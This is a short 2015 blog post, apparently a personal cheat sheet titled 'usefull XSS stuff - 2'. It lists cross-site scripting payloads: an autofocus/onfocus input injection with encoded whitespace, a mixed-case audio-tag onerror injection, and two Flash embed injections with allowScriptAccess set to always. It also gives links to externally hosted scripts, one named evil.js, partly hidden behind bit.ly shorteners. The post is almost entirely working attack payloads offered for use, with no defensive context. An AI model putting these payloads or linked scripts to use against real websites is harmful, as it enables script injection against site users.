Sunday, December 27, 2015

usefull XSS stuff - 2


input autofocus injection     
<input%09autofocus%09onfocus%3D"alert(1)"

injection with audio tag    
<aUdio src=x oNerror=alert()>

flash injection - 1      
<object><embed FlashVars="command=alert&param=XSS%20SUCCESSFULL" src="xss.swf" allowScriptAccess="always"></embed></object>

flash injection -2        
<object data="xss.swf"><param name="allowScriptAccess" value="always"><param name="FlashVars" value="command=alert&param=XSS%20SUCCESSFULL2"></object>

javascript evil.js            
http://yourjavascript.com/96141144528/evil.js
http://bit.ly/1E7rs2U


javascript flip images      
http://yourjavascript.com/30802011141/flipimages.js
http://bit.ly/1ycUvRe